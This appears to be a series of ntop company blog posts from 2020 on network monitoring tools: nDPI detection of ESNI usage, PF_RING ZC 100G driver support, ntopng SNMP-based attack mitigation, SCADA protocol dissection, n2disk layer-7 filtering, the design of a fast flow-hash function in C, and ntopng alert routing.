As the use of ESNI is not yet standard and still experimental, and as nDPI already supports the concept of security risk used to report potentially dangerous activities (e.g. a suspicious DGA domain or malformed HTTP header), it has been recently enhanced by adding a new security risk (NDPI_TLS_SUSPICIOUS_ESNI_USAGE) whenever TLS 1.3 flows use ESNI, as it can potentially hide information or potential attacks. Thanks for this security risk mechanism, all applications using nDPI (e.g. ntopng) can immediately detect this problem by simply recompiling them with the latest nDPI library without doing any code change. Of course if your application is used in inline mode, it can also block TLS 1.3 connections using ESNI.

Enjoy!

↧

Introducing PF_RING ZC support for Intel E810-based 100G adapters

August 24, 2020, 7:11 am

≫ Next: How Attack Mitigation Works (via SNMP)

≪ Previous: How to Detect Domain Hiding (a.k.a. as Domain Fronting)

Last year Intel announced a new family of 100 Gigabit network adapters, code-name Columbiaville. These new adapters, based on the new Intel Ethernet Controller E810, support 10/25/50/100 Gbps link speeds and provide programmable offload capabilities.

Programmability

800 Series adapters implement new features to improve connectivity, storage protocols, and programmability, also thanks to the Dynamic Device Personalization (DDP) technology which adds support for a programmable pipeline. In fact, with DDP, a parser embedded in the controller can support the software parsing custom protocols and manipulating outgoing packets, paving the way to adding new offload capabilities, in addition to those usually available in commodity adapters (e.g. Large Receive Offload, L3/L4 checksum computation, VLAN stripping, etc.). The ability, for instance, to classify custom protocols in hardware and distribute packets to specific queues based on custom packet types, improves the application performance in many use cases. It is possible for instance to extend Receive Side Scaling (RSS) and Flow Director (FDIR) capabilities to be able to inspect encapsulated packet headers as in case of GTP traffic. This was firstly introduced in 700 Series controllers, but with the 800 series it is possible to load custom DDP profiles at boot or during run-time.

Performance

The ice-zc driver, introduced a few weeks ago as part of the PF_RING ZC framework, provides Zero-Copy support for 800 Series adapters. Based on initial tests at 100 Gigabit on an Intel Xeon E-2136 CPU @ 3.30GHz, this controller demonstrated to be capable of capturing traffic at 25 Mpps per queue (it scales almost linearly by enabling RSS ) and transmitting almost 90 Mpps by using a single core. On an adequate CPU with enough cores this should let us process 100 Gigabit traffic with multi-process/multi-threaded applications that can leverage on RSS to distribute the load to multiple cores like nProbe Cento. In the above scenario, nProbe Cento processed with 6 RSS queues 78 Mpps (10k flows, 52 Gbit with 64 byte packets or 100 Gbit line rate with larger packets) with no drops making it suitable for low-cost commodity-hardware based packet processing.

Test Run

The ice-zc driver is already available in the nightly build repository and it can be installed following the instructions provided in the User’s Guide, which are the same for all the ZC drivers. The Intel E810 requires a programmable pipeline DDP package to be loaded by the driver during initialisation to support normal operations. The default DDP package file name is ice.pkg, this is provided with the ice-zc driver and should be placed under /lib/firmware/updates/intel/ice/ddp or /lib/firmware/intel/ice/ddp in order to be found by the driver. Done that your adapter is detected by PF_RING and you can use with tools such as pfcount or zsend.

Please note that the E810 chipset is currently in pre-release, to get early access to ethernet adapters for testing please contact Silicom.

↧

How Attack Mitigation Works (via SNMP)

August 26, 2020, 12:58 pm

≫ Next: Monitoring Industrial IoT/Scada Traffic with nDPI and ntopng

≪ Previous: Introducing PF_RING ZC support for Intel E810-based 100G adapters

One of the greatest strengths of ntopng is its ability to correlate data originating at different layers and at multiple sources together. For example, ntopng can look at IP packets, Ethernet frames and, at the same time, poll SNMP devices. This enables ntopng to effectively perform correlations and observe:

The behavior of IP addresses (e.g., Is this IP known to be blacklisted?)
The MAC addresses carrying IP traffic around in the network
The physical location of the MAC addresses (i.e., physical switches traversed by a given MAC address along with trunk and access ports)

ntopng, starting from version 4.1, capitalizes on this information to implement attack mitigation via SNMP. In other words, ntopng:

Uses an indication of compromise known as score to determine whether an IP is an attacker (client score) or a victim (server score).
Finds physical switches and access ports where attackers are connected to.
Uses SNMP to turn access ports down, thus effectively disconnecting the attackers from the healthy network.

Attack mitigation via SNMP is implemented as an ntopng plugin available in versions Enterprise M and above, and can be enabled from the user scripts configuration page

Let’s see what happens in practice. For this example, an attacker host 192.168.2.149 is configured to run a port scan (nmap -sS) towards 192.168.2.222. ntopng, using traffic and SNMP data is able to identify host 192.168.2.149 as a PcEngines connected to interface gigabitethernet15 of switch 192.168.2.168.

The port scan is immediately detected by ntopng

Indeed, there are many alerted “TCP Connection Refused” flows having 192.168.2.149 as source – apu is the DNS name of 192.168.2.149. Due to this suspicious activity, there is a significant increase in the score of 192.168.2.149

This score is high enough to ensure the attack mitigation via SNMP kicks in. Within a minute from the increase in the host score, mitigation causes the port on the SNMP device to be turned down

From this point on, attacker host 192.168.2.149 is effectively disconnected from the network and, thus, it becomes harmless. It is up to the network administrator now to intervene and do any necessary cleanup operation on the attacker host. Once the issues have been resolved, the SNMP port can be turned up again from the preferences.

Having attack mitigation via SNMP implemented in ntopng is just a preliminary step towards making ntopng not just a monitoring and visualisation tool but also something which proactively prevents attackers from harming the network.

What’s next is the ability to protect a network by mitigating external attackers. nScrub is a good example of a tool that can mitigate DDoS attacks. Stay tuned for news !

↧

Monitoring Industrial IoT/Scada Traffic with nDPI and ntopng

September 8, 2020, 11:27 am

≫ Next: September Webinars: ntopng Scripting and API Integrations

≪ Previous: How Attack Mitigation Works (via SNMP)

Monitoring Industrial IoT and SCADA traffic can be challenging as most open source monitoring tools are designed for Internet protocols. As this is becoming a hot topic with companies automating production lines, we have decided to enhance ntop tools to provide our user community traffic visibility even in industrial environments. This has required to enhance nDPI to detect these protocols and enhance ntopng, our monitoring console, to visualize this traffic by providing enhanced protocol dissection on top of which alerts can be triggered.

To date, nDPI supports modbus, DNP3 and IEC60870 protocols. In particular IEC 60870 is very important as it can be used to detect issues such as

Unknown telemetry addresses
Connection loss and restore
Loss of data coming from remote systems

The standard is quite complex and if you want to monitor this traffic to trigger alerts using open source software your choice is limited to custom scripts for the suricata IDS or Zeek/Malcom. As ntopng has the ability to trigger alerts by means of user-scripts when specific events happen, we have decided to enhance ntopng to dissect this traffic so that it is possible to emit custom alerts when specific communications are detected. In Scada in fact companies usually monitor traffic passively instead of actively dropping specific communications when something goes wrong: this is because the risk to drop a wrong packet is too high compared to the benefit and it is much better to trigger and alert and handle it rather than take the risk.

ntopng has been extended to continuously (i.e. not just the first few packets of a communication) monitor IEC 60870 communications and dissect individual PDUs. This way users can trigger alerts by means of ntopng user scripts. The flexibility introduced in ntopng 4.1.x that scripts can be bound to host pools, allow custom script configurations to be created for specific devices so that each device family has (potentially) its custom ruleset.

The above picture shows how a IEC 60870 is detected and reported by ntopng that in addition to usual latency, throughput, retransmissions… metrics it complements it with specific protocol information that can be used to detect anomalies and trigger alerts.

Happy IoT and Scada monitoring!

↧

September Webinars: ntopng Scripting and API Integrations

September 9, 2020, 4:19 am

≫ Next: How to Dump, Index, and Layer-7 Filter Network Traffic at High Speed

≪ Previous: Monitoring Industrial IoT/Scada Traffic with nDPI and ntopng

Save the date! Two webinars have been planned for the cycle of this month.

We start on Thursday, September 17th, 16:00 CEST / 10 AM EST, with “How to Write an ntopng Plugin“. In this workshop, we will see how to create an ntopng Lua plugin to generate alerts and opportunely update the ‘score’ indicator of compromise for hosts and flows. During the workshop, we will walk the audience through a typical workflow which can then be reused to write any kind of plugin. We will start with a simple “Hello World” plugin, and then we will extend its features, step-by-step, to generate alerts and update hosts and flows, depending on the nDPI “Risk Factor”. Intended audience is practitioners with minimal scripting skills. By the end of the workshop, participants will have sufficient skills and understanding necessary to extend ntopng with custom plugins.

Workshop agenda will be the following:

Introduction
- ntopng extensibility
Basic concepts
- Plugin functionalities
Goal definition
Hands on
- Creating an “Hello World” plugin
- Extending the plugin for the generation of alerts
Discussion
Wrap-Up and conclusions

Workshop will be held online on Microsoft Teams at this link.

Then, on Thursday, September 24th, 16:00 CEST / 10 AM EST, our friend Ronald Henderson will present “ntopng Data Acquisition API with Network Security Toolkit (NST)“. He will discuss NST production examples using the ntopng data acquisition API, including Geolocation Mercator Map, Google Earth KML Map and Google 3D Globe Multi-Series Maps. He will also demonstrate how ntopng has been integrated with NST, and show NST ntopng real-time Host and Flow Geolocation.

Presentation agenda will be the following:

Introduction information
Agenda Summary
Example NST production examples using the ntopng data acquisition API
- Geolocation Mercator Map
- Google Earth KML Map
- Google 3D Globe Multi-Series Maps
Command line (CLI)
- ntopng API Host Stats usage
- ntopng API Flow Stats usage
Ntopng NST integration
NST WUI Ntopng usage
NST Ntopng real-time Host and Flow Geolocation demo
Ntopng nDPI ndpiReader demo
Q & A

Presentation will be held online on Microsoft teams at this link.

↧

How to Dump, Index, and Layer-7 Filter Network Traffic at High Speed

September 17, 2020, 6:13 am

≫ Next: How Great Hashing Can (More Than) Double Application Performance

≪ Previous: September Webinars: ntopng Scripting and API Integrations

n2disk is an application that many of the ntop community uses to dump traffic up to 100 Gbit. What few people know is that n2disk can index data not just using packet header information (i.e. IP, port. VLAN, MAC…) but also using nDPI to produce an index that contains application protocol information.

This filtering can happen:

During packet capture (i.e. instruct n2disk to avoid dumping specific protocols such as Netflix or YouTube that take up a lot of disk space and that are usually harmless).
While extracting packets from stored pcap files.
With any PF_RING-based application, including those using libpcap such as tcpdump or Suricata.

L7 Capture Filters

Thanks to the integration with PF_RING FT (no additional PF_RING FT license is necessary with n2disk 10/40/100 Gbit), n2disk supports –l7-filter-conf <file> to specify a configuration file where it is possible to define which protocols can be forwarded tot the n2disk engine and which one should be discarded and hence not dumped on pcaps. Example for dropping streaming and dumping the rest, you can specify a filter file name ft.conf as the one below

[global]
default = forward

[filter]
YouTube = discard
Netflix = discard

L7 Extraction Filters

During pcap extraction, it is possible to extract selected packets from pcaps using L7 filtering only if an extended (add -I -E 2 to n2disk) index has been created during packet capture. This way the n2disk companion utility named npcapextract can filter packets usign L7 protocol in addition to usual packet header-based filters. For instance for filtering all Instagram traffic made by host 192.168.1.1 do

npcapextract -t /storage -b "2020-09-16 12:05:32" -e "2020-09-16 12:10:32" -o output.pcap -f "ip host 192.168.1.1 and l7proto Instagram"

This technique supports all the nDPI detected protocols, that is continuously updated as new protocol/versions are supported.

Using L7 Filtering with PF_RING-based tools (including tcpdump)

In addition to n2disk, PF_RING supports L7 filtering natively. You simply have to compile your application on top of PF_RING or of libpcap-PF_RING. For instance if you use tcpdump compiled on top of PF_RING (that you can find here) you can do

# PF_RING_FT_CONF=ft.conf tcpdump -ni pcap:file.pcap

or

# PF_RING_FT_CONF=ft.conf tcpdump -i eth0

Note that with live traffic, nDPI needs a few packets to detect the application protocol, hence for TCP-based protocols for instance the initial 3WH is not filtered whereas the following packets will be filtered according to L7 rules.

If you want to know more about this technique you can read more in the n2disk user’s guide.

Summary

Thanks for nDPI, via PF_RING, you can now complement existing packet header-based filtering techniques such as BPF, with layer-7 filtering both during packet capture, indexing and extraction. This allows you to save disk space dumping unwanted protocols, and extract only the traffic you care about, that can be complicated to do with the plethora of application protocols present in modern network traffic.

↧

How Great Hashing Can (More Than) Double Application Performance

October 4, 2020, 11:32 pm

≫ Next: Using ntopng Recipients and Endpoints for Flexible Alert Handling

≪ Previous: How to Dump, Index, and Layer-7 Filter Network Traffic at High Speed

Most ntop applications (ntopng, nProbe, Cento) and libraries (FT) are based on the concept of flow processing, that merely means keeping track of all network communications. In order to implement this, network packets are decoded and, based on a “key” (usually a 5-tuple consisting of protocol and src/dst IP and port), clustered into flows (other keys such as VLAN can be added if necessary). This usually requires a lookup in an hash table, by using an hash function to translate the key into an index for an array with collision lists.
A good hash function should be collision resistant (it should be hard to find two inputs keys that hash to the same index), this to avoid huge collision lists which affect the performance of a lookup. However building a strong hash often translates in poor performance, in fact most of the well-known hash functions that are publicly available are computationally expensive.

A few days ago, we have been struggling optimising one of our applications, to make it processing traffic at 100 Gbps. This application had to perform flow classification and a bunch of other activities within the same thread. During this analysis, we ended up trying to accelerate hash lookups, and we faced with the hash function, which was taking most of the CPU. The application was using the Fowler-Noll-Vo (FNV) hash function which is one of the fastest out of those available in literature, and with a fairly good distribution. This led to a discussion with our friend Logan oos Even, which is helping us a lot with applied cryptography in n2n and demonstrated a strong experience in the field. At the end of the discussion, he offered to help building a fast hash function from scratch for our application.

The requirements for the hash were clear:

12 byte input (this is what we need for a bidirectional flow key)
32 bit output (enough to index any hash table size)
well distributed, for use with an hash table
**fast**, the hash function itself has to be able to compute at least 600K hashes per second (we got this number with some math with required performance and cpu cycles available) on a E3 3 GHz CPU
optionally consider SSE 4.2 or AVX 2 which are supported by most CPUs today

This sounded easy to Logan and he started considering to use round functions of some ARX ciphers, or otherwise take advantage of hardware accelerated AES-NI (that should be available on cpus supporting AVX2).

Only having a laptop computer (Intel i7 2860QM) available, Logan found that his favorite Pearson hashing was too slow to meet the requirements. Having a quick look at FNV, which is what we initially selected for the application, Logan found that it walked byte-by-byte through the input, just like Pearson hashing. Thus is what the first idea was: what if we take the input in chunks of 32 or 64 bits instead? No problem as we had well structured 12 byte input which made three same-sized 32-bit input pieces.

As second idea, Logan was thinking to the xorshift pseudo random number generator, with a round function offering a somewhat scrambling bijection. Unfortunately, in this approach zero get mapped to zero – something he wanted to avoid for the beauty of the output. Also, input states with only few bits set are transformed to output with only a few (more) bits set. To counter this, he decremented the input (zero becomes “all set”, and at least all trailing zero-bits turned to ‘1′), accumulated the result, and added the other input words between the scrambling rounds. The addition operation interrupted the sequence of otherwise linear shifts and exclusive-ors and thus kept out xor-shift-patterns from distribution to a certain degree.

So, the first draft was ready to be tested:

// 'in' points to some 12 byte memory data to be hashed
// uses round function of xorshift32 prng
uint32_t simple_hash (uint8_t *in) {
  uint32_t ret = 0;

  ret += *(uint32_t*)(in+0);
  ret--;

  ret ^= ret << 13; // 1st round function of xorshift32
  ret ^= ret >> 17;
  ret ^= ret << 5;

  ret += *(uint32_t*)(in+4);
  ret--;

  ret ^= ret << 13; // 2nd round function of xorshift32
  ret ^= ret >> 17;
  ret ^= ret << 5;

  ret ^= ret << 13; // another round for more scrambling
  ret ^= ret >> 17;
  ret ^= ret << 5;

  ret += *(uint32_t*)(in+8);

  return ret;
}

First of all we had to check the distribution, this has been done by applying empirical statistics. That was counting how often different groups of output appeared for certain input patterns, e.g. all inputs with a suffix `0x00`¹⁰ (varying the first two bytes only) that led to an output with a leading `F` nibble. It should be around 4096. This has been repeated for a lot of combinations, positions and lengths to see enough evidence of a somewhat rectangular distribution. However, it was important to have a look at vastly listed output of subsequent input data: one could find “regions” of repeating patterns or always zero digits for certain input ranges. The latter was the reason for placing an additional scrambling round.

Talking about distribution, Logan cared for bijectivity of all building-blocks because he did not want to miss a thing, on neither side – neither domain nor co-domain. Any two items mapped to the same value would negatively impact output distribution.

On Logan’s laptop, at a clock speed of 3.6GHz but with an old Intel architecture, this turned out to deliver slightly above 105 Mhps (Million hashes per second) if compiled with `-O3` compiler optimizations, 40 Mhps without. Then we tried on a Xeon machine, more similar to a production machine, a Xeon E3-1230 v5 3.4GHz. On this system the function was capable of computing 260 Mhps!

As a first step of revision, Logan decided to replace the “2nd round function” of xorshift32 with another bijection that also relied on simple primitives such as rotation and bitwise operation: xor-rotate, assuming that the compiler would have translated the ROR macro (see the code below) into the assembly rotate instruction, accelerating the computation:

  #define ROR32(x,r) (((x)>>(r))|((x)<<(32-(r))))
  …
  ret ^= ROR32(ret, 17) ^ ROR32(ret, 13);

And yes, this was delivering 304M flows per second!

By the way, replacing the “2nd round function” and not “another round function” was a decision based on output observation.

Now, how to double performance to reach 600 Mhps as per the requirement? Getting rid of instructions! Hence, Logan reduced it all to one shift-xor round between whose steps he interleaved the additions of the three words, and used a final scramble to make output look good:

#define ROR32(x,r) (((x)>>(r))|((x)<<(32-(r))))

// 'in' points to some 12 byte memory data to be hashed;
// interleaves additions of data into one round function of xorshift32 prng
// and performs a bijective final xor-rotate
uint32_t simple_hash (uint8_t *in) {
  uint32_t ret = *(uint32_t*)in;
  ret--;

  ret ^= ret << 13; // 1st step of round function of xorshift32

  ret += *(uint32_t*)(in+4);
  ret--;

  ret ^= ret >> 17; // 2nd step of round function of xorshift32

  ret += *(uint32_t*)(in+8);

  ret ^= ret <<  5; // 3rd step of round function of xorshift32

  ret ^= ROR32(ret, 17) ^ ROR32(ret, 11); // final scramble xor-rotate

  return ret;
}

This did not fully double performance on Logan’s i7 2860QM but on his second computer which is powered by an Intel i7 7500U. Assuming this same benefit from a more modern CPU architecture, we tried on the Xeon, pretty sure that it would also have shown the doubling: 365M flows per second. That was definitely strange! We were not yet there.

Trying SSE to load 16 bytes at once (adding some padding to the input data) was a disaster. Even with the simplest SSE instruction applied to the data was way slower than any of the scalar versions above. Same result for one or two rounds of hardware accelerated AES applied to the data in SSE register. It seemed that performance was eaten up by the load and store operations. Reading longer data from memory seemed to result in extra cost. That was in line with Logan’s former experience and the reason why he preferably sticked to 32 bit – 64-bit operations were much slower on 2860QM even though considered a 64-bit CPU.

At this point Logan was concerned that he even tried an idea that he originally had ruled out: linear congruential generators. He feared the cost of multiplication and reading the constant factor from memory. Sticking with 32-bit and choosing some arbitrary, probably not correctly chosen constants, he was surprised to see that this resulted in doubled speed on i7 2860QM.

#define ROR32(x,r) (((x)>>(r))|((x)<<(32-(r))))

// 'in' points to some 12 byte memory data to be hashed;
// applies different linear congruential generators
// and performs a bijective final xor-rotate
uint32_t simple_hash (uint8_t *in) {
  uint32_t a, b, c;

  a = *(uint32_t*)(in + 0);
  b = *(uint32_t*)(in + 4);
  c = *(uint32_t*)(in + 8);

  a = a * 0x53731741 + 0x61949103;
  b = b * 0x7038151b + 0x29875275;
  c = c * 0xc2758245 + 0x28759251;

  a = (a + b + c);

  // final scramble
  a ^= ROR32(a, 17) ^ ROR32(a, 11);

  return a;
}

416 Mhps.

Seemingly, a step into the right direction. Based on our experience with Xeon CPUs, we suggested Logan to try using 64-bit arithmetic to save one multiplication. Logan, that had experience with his i7, was reluctant but gave it a shot, merging `a` and `b` into one 64-bit generator, keeping `c` at the presumably faster 32-bit. Indeed, this version turned out slower on i7. But, this was surprisingly delivering 530 Mhps! So, Logan decided to make it two 64-bit generators. These linear congruential generators would have bijective property if their parameters were chosen wisely.

The linear congruential generators shared the property that any suffix of a certain length sequentially repeats, e.g. the last nibble of a sequential output would always repeat after 16 steps. This would probably also hold true for the sum of two generator outputs. For that reason, a final scramble of a different method was required. Here, the xor-rotate came in handy again. This code has been added to the nDPI toolkit so every application using it can take advantage of it without having to duplicate code.

#define ROR64(x,r) (((x)>>(r))|((x)<<(64-(r))))

/*                                                                                                                                                                                                                      
  'in_16_bytes_long` points to some 16 byte memory data to be hashed;                                                                                                                                                   
  two independent 64-bit linear congruential generators are applied                                                                                                                                                     
  results are mixed, scrambled and cast to 32-bit                                                                                                                                                                       
*/
u_int32_t ndpi_quick_16_byte_hash(u_int8_t *in_16_bytes_long) {
  u_int64_t a = *(u_int64_t*)(in_16_bytes_long + 0);
  u_int64_t c = *(u_int64_t*)(in_16_bytes_long + 8);

  // multipliers are taken from sprng.org, addends are prime                                                                                                                                                            
  a = a * 0x2c6fe96ee78b6955 + 0x9af64480a3486659;
  c = c * 0x369dea0f31a53f85 + 0xd0c6225445b76b5b;

  // mix results                                                                                                                                                                                                        
  a += c;

  // final scramble                                                                                                                                                                                                     
  a ^= ROR64(a, 13) ^ ROR64(a, 7);

  // down-casting, also taking advantage of upper half                                                                                                                                                                  
  a ^= a >> 32;

  return((u_int32_t)a);
}

598 Mhps! We made it!

At the end of this journey, we learned a lot. Especially the proverbial expression “your mileage may vary” proved true along the way. We are pretty sure that there might be even faster ways to go. If you feel like sending your code to us, we can get back to you with a score (Mhps). :-)

Special thanks to Logan oos Even who helped ntop once again with passion and dedication.

↧

Using ntopng Recipients and Endpoints for Flexible Alert Handling

October 12, 2020, 7:03 am

≫ Next: Using ElasticSearch to Store and Correlate Ntopng Alarms

≪ Previous: How Great Hashing Can (More Than) Double Application Performance

In the latest ntopng 4.1.x versions (and soon 4.2) we have completely reworked the way alerts are delivered to subscribers. Up to 4.0 the ntopng engine was configured in a single way for all alerts: go to the preferences page and specify where to deliver alerts. This was suboptimal for many reasons, including the fact that it was not possible to send alerts to different recipients on different channels, or selectively decide when send alerts out.

For this reason we have introduced the concept of

Endpoints
server account configuration where to send alerts to. It is used to configure once the server parameters (for email for instance you need to configure the server IP, username and password) that you can reuse multiple times.
Recipient
Endpoint users to which deliver an alert. For instance once you have configured a email server account endpoint, you can define several recipients that can be reached over the same endpoint simply inheriting the configuration of the endpoint and defining just the recipient email address.

For impatients we have prepared a video that shows you all steps to follow in detail

otherwise you can follow this short tutorial below.

How to Configure Recipients and Endpoints

This is done by selecting the System interface, using the Notification submenu.

Endpoints have to be defined first as follows

Note that there are several endpoint families including

Email
ElasticSearch
Slack
WebHook
Discord
Syslog

At this point you can define a recipient that is the one who will receive the alert message.

Note that you can specify what alert severity and category can be delivered to this person. This way you can for instance deliver security events to one recipient, and network events to another.

Of course you can define multiple recipient and endpoints.

Binding Recipients to Alerts

Now that we have defined where alerts should be delivered we need to specify how/when alerts are delivered to the specified recipients. This is implements through Pools that you can access under the System menu.

Pools are a way to cluster up resources for which we want to apply a specific setup. As you can see from the picture below there are various pool families:

Hosts
Interfaces
Local networks
SNMP Devices
Active Monitoring
Host Pools (pools of host pools)
Flows
Devices
System (Interface)

Suppose you want to send an alert when active monitoring has an alert to report. All you need to do is

Select the Active Monitoring Tab
Click on the Edit button and specify on the dropdown menu the recipient we have just defined and save it

If you want to double check if this setup is correct, you can go to an active monitoring resource you defined and edit it.

As you can see on the highlighted text above, the new recipient we defined has been defined and is now in use.

What if now you want do define different recipients for each monitored host? Well you need to go back to the pools page, select active monitoring (this will applies to other tabs) and define new pools as show below, and associate different recipients to them.

Then you can now go back to the active monitoring page and select for each host, the pool you like for such host as shown below

To make things more complicated, you need to master how host pools are defined. Contrary to active monitoring, host pools can be quite complex as you might want to define pool members based on IP addresses, networks (CIDR) and Mac Addresses (great for DHCP networks where IPs are floating).

Final Words

We hope that the concept of recipients and endpoints is now clear. What you can do now is have the flexibility to deliver events to selected recipients in a simple yet effective way. All these features are part of ntopng 4.1.x and soon of the next 4.2 stable release.

Enjoy!

↧